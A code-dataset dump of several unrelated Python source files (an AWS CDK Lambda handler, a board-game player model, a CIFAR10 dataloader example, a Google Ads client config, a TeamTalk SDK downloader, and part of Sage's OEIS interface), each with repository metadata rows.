] | 16,881 | 2019-07-11T18:58:07.000Z | 2022-03-31T23:59:47.000Z | packages/@aws-cdk-containers/ecs-service-extensions/lib/extensions/assign-public-ip/lambda/index.py | RichiCoder1/aws-cdk | 626e6aa1a27feffe7ce60a46a6fdcf26f317eaef | [
"Apache-2.0"
] | 2,504 | 2019-07-11T17:52:52.000Z | 2022-03-31T21:19:53.000Z | import logging
import os
import boto3
from lib.cleanup_resource_handler import CleanupResourceHandler
from lib.queue_handler import QueueHandler
logging.getLogger().setLevel(logging.INFO)
def queue_handler(event, context):
"""
Handler for the event queue lambda trigger
"""
ec2_client = boto3.client('ec2')
dynamodb_resource = boto3.resource('dynamodb')
route53_client = boto3.client('route53')
handler = QueueHandler(ec2_client=ec2_client, dynamodb_resource=dynamodb_resource, route53_client=route53_client,
environ=os.environ)
return handler.handle(event, context)
def cleanup_resource_handler(event, context):
"""
Event handler for the custom resource.
"""
route53_client = boto3.client('route53')
handler = CleanupResourceHandler(route53_client=route53_client)
handler.handle_event(event, context)
| 25.6 | 117 | 0.737723 | import logging
import os
import boto3
from lib.cleanup_resource_handler import CleanupResourceHandler
from lib.queue_handler import QueueHandler
logging.getLogger().setLevel(logging.INFO)
def queue_handler(event, context):
ec2_client = boto3.client('ec2')
dynamodb_resource = boto3.resource('dynamodb')
route53_client = boto3.client('route53')
handler = QueueHandler(ec2_client=ec2_client, dynamodb_resource=dynamodb_resource, route53_client=route53_client,
environ=os.environ)
return handler.handle(event, context)
def cleanup_resource_handler(event, context):
route53_client = boto3.client('route53')
handler = CleanupResourceHandler(route53_client=route53_client)
handler.handle_event(event, context)
| true | true |
79010271145bee87268177e76443c8d48acc66a9 | 2,781 | py | Python | src/Player.py | ForgedSnow/Frontiersman | c564238b120bd9a526a2ebd6b79ed5b021be2a6e | [
"MIT"
] | null | null | null | src/Player.py | ForgedSnow/Frontiersman | c564238b120bd9a526a2ebd6b79ed5b021be2a6e | [
"MIT"
] | null | null | null | src/Player.py | ForgedSnow/Frontiersman | c564238b120bd9a526a2ebd6b79ed5b021be2a6e | [
"MIT"
] | null | null | null | class PlayerResourceHand:
def __init__(self):
self.brick = 0
self.grain = 0
self.lumber = 0
self.ore = 0
self.wool = 0
self.totalResources = 0
def update(self):
self.totalResources = self.brick + self.grain + self.lumber + self.ore + self.wool
class PlayerDevelopmentHand:
def __init__(self):
self.knights = 0
self.roadBuildings = 0
self.yearOfPlenty = 0
self.monopolies = 0
self.victoryPoints = 0
self.totalDevelopments = 0
def update(self):
self.totalDevelopments = self.knights + self.roadBuildings + self.yearOfPlenty + self.monopolies \
+ self.victoryPoints
class EnemyPlayer:
def __init__(self, turnOrder, name, color, nR, nS, nC, lR, lA, hS, dS, vVP):
self.turnOrder = turnOrder
self.name = name
self.color = color
self.handSize = hS
self.developmentSize = dS
self.visibleVictoryPoints = vVP
self.numRoads = nR
self.numSettlements = nS
self.numCities = nC
self.longestRoad = lR
self.largestArmy = lA
class Player:
def __init__(self, name, color, turnOrder):
self.color = color
self.name = name
self.turnOrder = turnOrder
self.numRoads = 15
self.numSettlements = 5
self.numCities = 4
self.longestRoad = 0
self.largestArmy = 0
self.victoryPoints = 0
self.resourceHand = PlayerResourceHand()
self.developmentHand = PlayerDevelopmentHand()
self.ownedRoads = list()
self.ownedNodes = list()
def getNumResources(self):
return self.resourceHand.totalResources
def getNumDevelopment(self):
return self.developmentHand.totalDevelopments
def getSendToEnemies(self):
# toSend = EnemyPlayer(self.turnOrder, self.name, self.color,
# self.numRoads, self.numSettlements, self.numCities,
# self.longestRoad, self.largestArmy)
toSend = ','.join([self.turnOrder, self.name, self.color, self.numRoads, self.numSettlements, self.numCities,
self.longestRoad, self.largestArmy])
return toSend
def acquireRoad(self, road):
self.ownedRoads.append(road)
def acquireNode(self, node):
self.ownedNodes.append(node)
def addResources(self, array):
self.resourceHand.brick += array[0]
self.resourceHand.grain += array[1]
self.resourceHand.lumber += array[2]
self.resourceHand.ore += array[3]
self.resourceHand.wool += array[4]
self.resourceHand.totalResources += array[0] + array[1] + array[2] + array[3] + array[4]
| 32.337209 | 117 | 0.607695 | class PlayerResourceHand:
def __init__(self):
self.brick = 0
self.grain = 0
self.lumber = 0
self.ore = 0
self.wool = 0
self.totalResources = 0
def update(self):
self.totalResources = self.brick + self.grain + self.lumber + self.ore + self.wool
class PlayerDevelopmentHand:
def __init__(self):
self.knights = 0
self.roadBuildings = 0
self.yearOfPlenty = 0
self.monopolies = 0
self.victoryPoints = 0
self.totalDevelopments = 0
def update(self):
self.totalDevelopments = self.knights + self.roadBuildings + self.yearOfPlenty + self.monopolies \
+ self.victoryPoints
class EnemyPlayer:
def __init__(self, turnOrder, name, color, nR, nS, nC, lR, lA, hS, dS, vVP):
self.turnOrder = turnOrder
self.name = name
self.color = color
self.handSize = hS
self.developmentSize = dS
self.visibleVictoryPoints = vVP
self.numRoads = nR
self.numSettlements = nS
self.numCities = nC
self.longestRoad = lR
self.largestArmy = lA
class Player:
def __init__(self, name, color, turnOrder):
self.color = color
self.name = name
self.turnOrder = turnOrder
self.numRoads = 15
self.numSettlements = 5
self.numCities = 4
self.longestRoad = 0
self.largestArmy = 0
self.victoryPoints = 0
self.resourceHand = PlayerResourceHand()
self.developmentHand = PlayerDevelopmentHand()
self.ownedRoads = list()
self.ownedNodes = list()
def getNumResources(self):
return self.resourceHand.totalResources
def getNumDevelopment(self):
return self.developmentHand.totalDevelopments
def getSendToEnemies(self):
toSend = ','.join([self.turnOrder, self.name, self.color, self.numRoads, self.numSettlements, self.numCities,
self.longestRoad, self.largestArmy])
return toSend
def acquireRoad(self, road):
self.ownedRoads.append(road)
def acquireNode(self, node):
self.ownedNodes.append(node)
def addResources(self, array):
self.resourceHand.brick += array[0]
self.resourceHand.grain += array[1]
self.resourceHand.lumber += array[2]
self.resourceHand.ore += array[3]
self.resourceHand.wool += array[4]
self.resourceHand.totalResources += array[0] + array[1] + array[2] + array[3] + array[4]
| true | true |
790105945b5bef769bbf33300bcce00966e4713d | 711 | py | Python | example.py | ildoonet/remote-dataloader | 2d51ed883f57632fef08f1475221641f48a0adea | [
"MIT"
] | 64 | 2019-10-09T02:35:48.000Z | 2021-09-22T11:54:03.000Z | example.py | ildoonet/remote-dataloader | 2d51ed883f57632fef08f1475221641f48a0adea | [
"MIT"
] | null | null | null | example.py | ildoonet/remote-dataloader | 2d51ed883f57632fef08f1475221641f48a0adea | [
"MIT"
] | 2 | 2021-05-01T13:13:31.000Z | 2021-07-26T04:54:16.000Z | import torchvision as torchvision
from torchvision.transforms import transforms
from tqdm import tqdm
from remote_dataloader.loader import RemoteDataLoader
if __name__ == '__main__':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
total_trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
loader = RemoteDataLoader(total_trainset, batch_size=32, timeout=5)
for epoch in range(5):
for img, lb in tqdm(loader):
pass
| 33.857143 | 118 | 0.708861 | import torchvision as torchvision
from torchvision.transforms import transforms
from tqdm import tqdm
from remote_dataloader.loader import RemoteDataLoader
if __name__ == '__main__':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
total_trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
loader = RemoteDataLoader(total_trainset, batch_size=32, timeout=5)
for epoch in range(5):
for img, lb in tqdm(loader):
pass
| true | true |
790105aadf839cb9fdee284f67b7515e1f3e0deb | 1,191 | py | Python | google/ads/google_ads/v1/services/customer_feed_service_client_config.py | jiulongw/google-ads-python | 6f5256eb1eeb5a9a95c8cdb9b97988d3a676282e | [
"Apache-2.0"
] | 1 | 2019-11-30T23:42:39.000Z | 2019-11-30T23:42:39.000Z | google/ads/google_ads/v1/services/customer_feed_service_client_config.py | jiulongw/google-ads-python | 6f5256eb1eeb5a9a95c8cdb9b97988d3a676282e | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v1/services/customer_feed_service_client_config.py | jiulongw/google-ads-python | 6f5256eb1eeb5a9a95c8cdb9b97988d3a676282e | [
"Apache-2.0"
] | 1 | 2020-03-13T00:14:31.000Z | 2020-03-13T00:14:31.000Z | config = {
"interfaces": {
"google.ads.googleads.v1.services.CustomerFeedService": {
"retry_codes": {
"idempotent": ["DEADLINE_EXCEEDED", "UNAVAILABLE"],
"non_idempotent": []
},
"retry_params": {
"default": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
}
},
"methods": {
"GetCustomerFeed": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default"
},
"MutateCustomerFeeds": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default"
}
}
}
}
}
| 35.029412 | 67 | 0.438287 | config = {
"interfaces": {
"google.ads.googleads.v1.services.CustomerFeedService": {
"retry_codes": {
"idempotent": ["DEADLINE_EXCEEDED", "UNAVAILABLE"],
"non_idempotent": []
},
"retry_params": {
"default": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
}
},
"methods": {
"GetCustomerFeed": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default"
},
"MutateCustomerFeeds": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default"
}
}
}
}
}
| true | true |
790106627f39c9d181898047c1ca44efdac4def0 | 3,906 | py | Python | tools/ttsdk_downloader.py | ahmetecevitli/TTMediaBot | 94297955156dedbba8ce385efcdd1d4c0a921ac4 | [
"MIT"
] | 30 | 2021-05-12T10:23:41.000Z | 2022-03-31T10:13:42.000Z | tools/ttsdk_downloader.py | ahmetecevitli/TTMediaBot | 94297955156dedbba8ce385efcdd1d4c0a921ac4 | [
"MIT"
] | 29 | 2021-05-12T17:47:09.000Z | 2022-02-19T11:45:23.000Z | tools/ttsdk_downloader.py | ahmetecevitli/TTMediaBot | 94297955156dedbba8ce385efcdd1d4c0a921ac4 | [
"MIT"
] | 36 | 2021-05-12T14:58:15.000Z | 2022-03-31T10:06:52.000Z | #!/usr/bin/env python3
import os
import platform
import shutil
import sys
from urllib import request
import bs4
import patoolib
url = "http://bearware.dk/teamtalksdk"
cd = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def get_url_suffix_from_platform() -> str:
machine = platform.machine()
if sys.platform == "win32":
architecture = platform.architecture()
if machine == "AMD64" or machine == "x86":
if architecture[0] == "64bit":
return "win64"
else:
return "win32"
else:
sys.exit("Native Windows on ARM is not suported")
elif sys.platform == "darwin":
sys.exit("Darwin is not supported")
else:
if machine == "AMD64" or machine == "x86_64":
return "ubuntu18_x86_64"
elif "arm" in machine:
return "raspbian_armhf"
else:
sys.exit("Your architecture is not supported")
def download() -> None:
r = request.urlopen(url)
html = r.read().decode("UTF-8")
page = bs4.BeautifulSoup(html, features="html.parser")
versions = page.find_all("li")
last_version = versions[-1].a.get("href")[0:-1]
download_url = (
url
+ "/"
+ last_version
+ "/"
+ "tt5sdk_{v}_{p}.7z".format(v=last_version, p=get_url_suffix_from_platform())
)
print("Downloading from " + download_url)
request.urlretrieve(download_url, os.path.join(cd, "ttsdk.7z"))
def extract() -> None:
try:
os.mkdir(os.path.join(cd, "ttsdk"))
except FileExistsError:
shutil.rmtree(os.path.join(cd, "ttsdk"))
os.mkdir(os.path.join(cd, "ttsdk"))
patoolib.extract_archive(
os.path.join(cd, "ttsdk.7z"), outdir=os.path.join(cd, "ttsdk")
)
def move() -> None:
path = os.path.join(cd, "ttsdk", os.listdir(os.path.join(cd, "ttsdk"))[0])
try:
if sys.platform == "win32":
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/TeamTalk5.dll"),
os.path.join(cd, "TeamTalk5.dll"),
)
else:
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/libTeamTalk5.so"),
os.path.join(cd, "libTeamTalk5.so"),
)
except FileExistsError:
if sys.platform == "win32":
os.remove(os.path.join(cd, "TeamTalk5.dll"))
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/TeamTalk5.dll"),
os.path.join(cd, "TeamTalk5.dll"),
)
else:
os.remove(os.path.join(cd, "libTeamTalk5.so"))
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/libTeamTalk5.so"),
os.path.join(cd, "libTeamTalk5.so"),
)
try:
os.rename(
os.path.join(path, "Library/TeamTalkPy"), os.path.join(cd, "TeamTalkPy")
)
except OSError:
shutil.rmtree(os.path.join(cd, "TeamTalkPy"))
os.rename(
os.path.join(path, "Library/TeamTalkPy"), os.path.join(cd, "TeamTalkPy")
)
try:
os.rename(
os.path.join(path, "License.txt"), os.path.join(cd, "TTSDK_license.txt")
)
except FileExistsError:
os.remove(os.path.join(cd, "TTSDK_license.txt"))
os.rename(
os.path.join(path, "License.txt"), os.path.join(cd, "TTSDK_license.txt")
)
def clean() -> None:
os.remove(os.path.join(cd, "ttsdk.7z"))
shutil.rmtree(os.path.join(cd, "ttsdk"))
def install() -> None:
print("Installing TeamTalk sdk components")
print("Downloading latest sdk version")
download()
print("Downloaded. extracting")
extract()
print("Extracted. moving")
move()
print("moved. cleaning")
clean()
print("cleaned.")
print("Installed")
if __name__ == "__main__":
install()
| 28.933333 | 86 | 0.569636 |
import os
import platform
import shutil
import sys
from urllib import request
import bs4
import patoolib
url = "http://bearware.dk/teamtalksdk"
cd = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def get_url_suffix_from_platform() -> str:
machine = platform.machine()
if sys.platform == "win32":
architecture = platform.architecture()
if machine == "AMD64" or machine == "x86":
if architecture[0] == "64bit":
return "win64"
else:
return "win32"
else:
sys.exit("Native Windows on ARM is not suported")
elif sys.platform == "darwin":
sys.exit("Darwin is not supported")
else:
if machine == "AMD64" or machine == "x86_64":
return "ubuntu18_x86_64"
elif "arm" in machine:
return "raspbian_armhf"
else:
sys.exit("Your architecture is not supported")
def download() -> None:
r = request.urlopen(url)
html = r.read().decode("UTF-8")
page = bs4.BeautifulSoup(html, features="html.parser")
versions = page.find_all("li")
last_version = versions[-1].a.get("href")[0:-1]
download_url = (
url
+ "/"
+ last_version
+ "/"
+ "tt5sdk_{v}_{p}.7z".format(v=last_version, p=get_url_suffix_from_platform())
)
print("Downloading from " + download_url)
request.urlretrieve(download_url, os.path.join(cd, "ttsdk.7z"))
def extract() -> None:
try:
os.mkdir(os.path.join(cd, "ttsdk"))
except FileExistsError:
shutil.rmtree(os.path.join(cd, "ttsdk"))
os.mkdir(os.path.join(cd, "ttsdk"))
patoolib.extract_archive(
os.path.join(cd, "ttsdk.7z"), outdir=os.path.join(cd, "ttsdk")
)
def move() -> None:
path = os.path.join(cd, "ttsdk", os.listdir(os.path.join(cd, "ttsdk"))[0])
try:
if sys.platform == "win32":
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/TeamTalk5.dll"),
os.path.join(cd, "TeamTalk5.dll"),
)
else:
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/libTeamTalk5.so"),
os.path.join(cd, "libTeamTalk5.so"),
)
except FileExistsError:
if sys.platform == "win32":
os.remove(os.path.join(cd, "TeamTalk5.dll"))
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/TeamTalk5.dll"),
os.path.join(cd, "TeamTalk5.dll"),
)
else:
os.remove(os.path.join(cd, "libTeamTalk5.so"))
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/libTeamTalk5.so"),
os.path.join(cd, "libTeamTalk5.so"),
)
try:
os.rename(
os.path.join(path, "Library/TeamTalkPy"), os.path.join(cd, "TeamTalkPy")
)
except OSError:
shutil.rmtree(os.path.join(cd, "TeamTalkPy"))
os.rename(
os.path.join(path, "Library/TeamTalkPy"), os.path.join(cd, "TeamTalkPy")
)
try:
os.rename(
os.path.join(path, "License.txt"), os.path.join(cd, "TTSDK_license.txt")
)
except FileExistsError:
os.remove(os.path.join(cd, "TTSDK_license.txt"))
os.rename(
os.path.join(path, "License.txt"), os.path.join(cd, "TTSDK_license.txt")
)
def clean() -> None:
os.remove(os.path.join(cd, "ttsdk.7z"))
shutil.rmtree(os.path.join(cd, "ttsdk"))
def install() -> None:
print("Installing TeamTalk sdk components")
print("Downloading latest sdk version")
download()
print("Downloaded. extracting")
extract()
print("Extracted. moving")
move()
print("moved. cleaning")
clean()
print("cleaned.")
print("Installed")
if __name__ == "__main__":
install()
| true | true |
79010884e27cc910e075ae5bea295557189b9232 | 73,566 | py | Python | src/sage/databases/oeis.py | tashakim/sage | 467fbc70a08b552b3de33d9065204ee9cbfb02c7 | [
"BSL-1.0"
] | 4 | 2020-07-17T04:49:44.000Z | 2020-07-29T06:33:51.000Z | src/sage/databases/oeis.py | Ivo-Maffei/sage | 467fbc70a08b552b3de33d9065204ee9cbfb02c7 | [
"BSL-1.0"
] | null | null | null | src/sage/databases/oeis.py | Ivo-Maffei/sage | 467fbc70a08b552b3de33d9065204ee9cbfb02c7 | [
"BSL-1.0"
] | null | null | null | # -*- coding: utf-8 -*-
r"""
The On-Line Encyclopedia of Integer Sequences (OEIS)
You can query the OEIS (Online Database of Integer Sequences) through Sage in
order to:
- identify a sequence from its first terms.
- obtain more terms, formulae, references, etc. for a given sequence.
AUTHORS:
- Thierry Monteil (2012-02-10 -- 2013-06-21): initial version.
- Vincent Delecroix (2014): modifies continued fractions because of :trac:`14567`
- Moritz Firsching (2016): modifies handling of dead sequence, see :trac:`17330`
- Thierry Monteil (2019): refactorization (unique representation :trac:`28480`,
laziness :trac:`28627`)
EXAMPLES::
sage: oeis
The On-Line Encyclopedia of Integer Sequences (https://oeis.org/)
What about a sequence starting with `3, 7, 15, 1` ?
::
sage: search = oeis([3, 7, 15, 1], max_results=4) ; search # optional -- internet
0: A001203: Simple continued fraction expansion of Pi.
1: A240698: Partial sums of divisors of n, cf. A027750.
2: A082495: a(n) = (2^n - 1) mod n.
3: A165416: Irregular array read by rows: The n-th row contains those distinct positive integers that each, when written in binary, occurs as a substring in binary n.
sage: [u.id() for u in search] # optional -- internet
['A001203', 'A240698', 'A082495', 'A165416']
sage: c = search[0] ; c # optional -- internet
A001203: Simple continued fraction expansion of Pi.
::
sage: c.first_terms(15) # optional -- internet
(3, 7, 15, 1, 292, 1, 1, 1, 2, 1, 3, 1, 14, 2, 1)
sage: c.examples() # optional -- internet
0: Pi = 3.1415926535897932384...
1: = 3 + 1/(7 + 1/(15 + 1/(1 + 1/(292 + ...))))
2: = [a_0; a_1, a_2, a_3, ...] = [3; 7, 15, 1, 292, ...]
sage: c.comments() # optional -- internet
0: The first 5821569425 terms were computed by _Eric W. Weisstein_ on Sep 18 2011.
1: The first 10672905501 terms were computed by _Eric W. Weisstein_ on Jul 17 2013.
2: The first 15000000000 terms were computed by _Eric W. Weisstein_ on Jul 27 2013.
::
sage: x = c.natural_object() ; type(x) # optional -- internet
<class 'sage.rings.continued_fraction.ContinuedFraction_periodic'>
sage: x.convergents()[:7] # optional -- internet
[3, 22/7, 333/106, 355/113, 103993/33102, 104348/33215, 208341/66317]
sage: RR(x.value()) # optional -- internet
3.14159265358979
sage: RR(x.value()) == RR(pi) # optional -- internet
True
What about posets ? Are they hard to count ? To which other structures are they
related ?
::
sage: [Posets(i).cardinality() for i in range(10)]
[1, 1, 2, 5, 16, 63, 318, 2045, 16999, 183231]
sage: oeis(_) # optional -- internet
0: A000112: Number of partially ordered sets ("posets") with n unlabeled elements.
sage: p = _[0] # optional -- internet
::
sage: 'hard' in p.keywords() # optional -- internet
True
sage: len(p.formulas()) # optional -- internet
0
sage: len(p.first_terms()) # optional -- internet
17
::
sage: p.cross_references(fetch=True) # optional -- internet
0: A000798: Number of different quasi-orders (or topologies, or transitive digraphs) with n labeled elements.
1: A001035: Number of partially ordered sets ("posets") with n labeled elements (or labeled acyclic transitive digraphs).
2: A001930: Number of topologies, or transitive digraphs with n unlabeled nodes.
3: A006057: Number of topologies on n labeled points satisfying axioms T_0-T_4.
4: A079263: Number of constrained mixed models with n factors.
5: A079265: Number of antisymmetric transitive binary relations on n unlabeled points.
6: A263859: Triangle read by rows: T(n,k) (n>=1, k>=0) is the number of posets with n elements and rank k (or depth k+1).
7: A316978: Number of factorizations of n into factors > 1 with no equivalent primes.
8: A319559: Number of non-isomorphic T_0 set systems of weight n.
9: A326939: Number of T_0 sets of subsets of {1..n} that cover all n vertices.
10: A326943: Number of T_0 sets of subsets of {1..n} that cover all n vertices and are closed under intersection.
...
What does the Taylor expansion of the `e^{e^x-1}` function have to do with
primes ?
::
sage: x = var('x') ; f(x) = e^(e^x - 1)
sage: L = [a*factorial(b) for a,b in taylor(f(x), x, 0, 20).coefficients()] ; L
[1, 1, 2, 5, 15, 52, 203, 877, 4140, 21147, 115975, 678570, 4213597,
27644437, 190899322, 1382958545, 10480142147, 82864869804, 682076806159,
5832742205057, 51724158235372]
sage: oeis(L) # optional -- internet
0: A000110: Bell or exponential numbers: number of ways to partition a set of n labeled elements.
1: A292935: E.g.f.: exp(exp(-x) - 1).
sage: b = _[0] # optional -- internet
sage: b.formulas()[0] # optional -- internet
'E.g.f.: exp(exp(x) - 1).'
sage: [i for i in b.comments() if 'prime' in i][-1] # optional -- internet
'Number n is prime if mod(a(n)-2,n) = 0. -_Dmitry Kruchinin_, Feb 14 2012'
sage: [n for n in range(2, 20) if (b(n)-2) % n == 0] # optional -- internet
[2, 3, 5, 7, 11, 13, 17, 19]
.. SEEALSO::
- If you plan to do a lot of automatic searches for subsequences, you
should consider installing :mod:`SloaneEncyclopedia
<sage.databases.sloane>`, a local partial copy of the OEIS.
- Some infinite OEIS sequences are implemented in Sage, via the
:mod:`sloane_functions <sage.combinat.sloane_functions>` module.
.. TODO::
- in case of flood, suggest the user to install the off-line database instead.
- interface with the off-line database (or reimplement it).
Classes and methods
-------------------
"""
# ****************************************************************************
# Copyright (C) 2012 Thierry Monteil <sage!lma.metelu.net>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
from __future__ import print_function
from urllib.request import urlopen
from urllib.parse import urlencode
from sage.structure.sage_object import SageObject
from sage.structure.unique_representation import UniqueRepresentation
from sage.cpython.string import bytes_to_str
from sage.rings.integer import Integer
from sage.misc.verbose import verbose
from sage.misc.cachefunc import cached_method
from sage.misc.flatten import flatten
from sage.misc.temporary_file import tmp_filename
from sage.misc.unknown import Unknown
from sage.misc.misc import embedded
from sage.misc.html import HtmlFragment
from sage.repl.preparse import preparse
from collections import defaultdict
import re
oeis_url = 'https://oeis.org/'
def _fetch(url):
r"""
Fetch the given ``url``.
INPUT:
- ``url`` -- a string corresponding to the URL to be fetched.
OUTPUT:
- a string representing the fetched web page.
TESTS::
sage: from sage.databases.oeis import _fetch, oeis_url
sage: _fetch(oeis_url + 'hints.html')[-8:-1] # optional -- internet
'</html>'
"""
try:
verbose("Fetching URL %s ..." % url, caller_name='OEIS')
f = urlopen(url)
result = f.read()
f.close()
return bytes_to_str(result)
except IOError as msg:
raise IOError("%s\nError fetching %s." % (msg, url))
def _urls(html_string):
r"""
Return the list of URLs contained in ``html_string``.
Only URLs provided by HTML hyperlinks (``href`` attribute of ``<a>`` tags)
in are returned, not text strings starting with ``http://``.
INPUT:
- ``html_string`` -- a string representing some HTML code.
OUTPUT:
- a list of (string) URLs contained in ``html_string``.
EXAMPLES::
sage: from sage.databases.oeis import _urls
sage: html = 'http://example.com is not a link, but <a href="http://sagemath.org/">sagemath</a> is'
sage: _urls(html)
['http://sagemath.org/']
"""
urls = []
from html.parser import HTMLParser
class MyHTMLParser(HTMLParser):
def handle_starttag(self, tag, attrs):
if tag == 'a':
for attr in attrs:
if attr[0] == 'href':
urls.append(attr[1])
MyHTMLParser().feed(html_string)
return urls
to_tuple = lambda string: tuple(Integer(x) for x in string.split(",") if x)
class OEIS:
r"""
The On-Line Encyclopedia of Integer Sequences.
``OEIS`` is a class representing the On-Line Encyclopedia of Integer
Sequences. You can query it using its methods, but ``OEIS`` can also be
called directly with three arguments:
- ``query`` - it can be:
- a string representing an OEIS ID (e.g. 'A000045').
- an integer representing an OEIS ID (e.g. 45).
- a list representing a sequence of integers.
- a string, representing a text search.
- ``max_results`` - (integer, default: 30) the maximum number of
results to return, they are sorted according to their relevance. In
any cases, the OEIS website will never provide more than 100 results.
- ``first_result`` - (integer, default: 0) allow to skip the
``first_result`` first results in the search, to go further.
This is useful if you are looking for a sequence that may appear
after the 100 first found sequences.
OUTPUT:
- if ``query`` is an integer or an OEIS ID (e.g. 'A000045'), returns
the associated OEIS sequence.
- if ``query`` is a string, returns a tuple of OEIS sequences whose
description corresponds to the query. Those sequences can be used
without the need to fetch the database again.
- if ``query`` is a list of integers, returns a tuple of OEIS sequences
containing it as a subsequence. Those sequences can be used without
the need to fetch the database again.
EXAMPLES::
sage: oeis
The On-Line Encyclopedia of Integer Sequences (https://oeis.org/)
A particular sequence can be called by its A-number or number::
sage: oeis('A000040') # optional -- internet
A000040: The prime numbers.
sage: oeis(45) # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
The database can be searched by subsequence::
sage: search = oeis([1,2,3,5,8,13]) ; search # optional -- internet
0: A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
1: A290689: Number of transitive rooted trees with n nodes.
2: A027926: Triangular array T read by rows: T(n,0) = T(n,2n) = 1 for n >= 0; T(n,1) = 1 for n >= 1; T(n,k) = T(n-1,k-2) + T(n-1,k-1) for k = 2..2n-1, n >= 2.
sage: fibo = search[0] # optional -- internet
sage: fibo.name() # optional -- internet
'Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.'
sage: print(fibo.first_terms()) # optional -- internet
(0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987, 1597,
2584, 4181, 6765, 10946, 17711, 28657, 46368, 75025, 121393, 196418,
317811, 514229, 832040, 1346269, 2178309, 3524578, 5702887, 9227465,
14930352, 24157817, 39088169, 63245986, 102334155)
sage: fibo.cross_references()[0] # optional -- internet
'A039834'
sage: fibo == oeis(45) # optional -- internet
True
sage: sfibo = oeis('A039834')
sage: sfibo.first_terms() # optional -- internet
(1, 1, 0, 1, -1, 2, -3, 5, -8, 13, -21, 34, -55, 89, -144, 233,
-377, 610, -987, 1597, -2584, 4181, -6765, 10946, -17711, 28657,
-46368, 75025, -121393, 196418, -317811, 514229, -832040, 1346269,
-2178309, 3524578, -5702887, 9227465, -14930352, 24157817)
sage: tuple(abs(i) for i in sfibo.first_terms())[2:20] == fibo.first_terms()[:18] # optional -- internet
True
sage: fibo.formulas()[4] # optional -- internet
'F(n) = F(n-1) + F(n-2) = -(-1)^n F(-n).'
sage: fibo.comments()[1] # optional -- internet
"F(n+2) = number of binary sequences of length n that have no
consecutive 0's."
sage: fibo.links()[0] # optional -- internet
'https://oeis.org/A000045/b000045.txt'
The database can be searched by description::
sage: oeis('prime gap factorization', max_results=4) # optional --internet
0: A073491: Numbers having no prime gaps in their factorization.
1: A073485: Product of any number of consecutive primes; squarefree numbers with no gaps in their prime factorization.
2: A073490: Number of prime gaps in factorization of n.
3: A073492: Numbers having at least one prime gap in their factorization.
.. NOTE::
The following will fetch the OEIS database only once::
sage: oeis([1,2,3,5,8,13]) # optional -- internet
0: A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
1: A290689: Number of transitive rooted trees with n nodes.
2: A027926: Triangular array T read by rows: T(n,0) = T(n,2n) = 1 for n >= 0; T(n,1) = 1 for n >= 1; T(n,k) = T(n-1,k-2) + T(n-1,k-1) for k = 2..2n-1, n >= 2.
sage: oeis('A000045') # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
Indeed, due to some caching mechanism, the sequence is not re-created
when called from its ID.
"""
def __call__(self, query, max_results=3, first_result=0):
r"""
See the documentation of :class:`OEIS`.
TESTS::
sage: oeis()
Traceback (most recent call last):
...
TypeError: __call__() ...
"""
if isinstance(query, str):
if re.match('^A[0-9]{6}$', query):
return self.find_by_id(query)
else:
return self.find_by_description(query, max_results, first_result)
elif isinstance(query, (int, Integer)):
return self.find_by_id(query)
elif isinstance(query, (list, tuple)):
return self.find_by_subsequence(query, max_results, first_result)
def __repr__(self):
r"""
Return the representation of ``self``.
TESTS::
sage: oeis
The On-Line Encyclopedia of Integer Sequences (https://oeis.org/)
"""
return "The On-Line Encyclopedia of Integer Sequences (%s)" % oeis_url
def find_by_id(self, ident, fetch=False):
r"""
INPUT:
- ``ident`` -- a string representing the A-number of the sequence
or an integer representing its number.
- ``fetch`` -- (bool, default: ``False``) whether to force fetching the
content of the sequence on the internet.
OUTPUT:
- The OEIS sequence whose A-number or number corresponds to ``ident``.
EXAMPLES::
sage: oeis.find_by_id('A000040') # optional -- internet
A000040: The prime numbers.
sage: oeis.find_by_id(40) # optional -- internet
A000040: The prime numbers.
"""
sequence = OEISSequence(ident=ident)
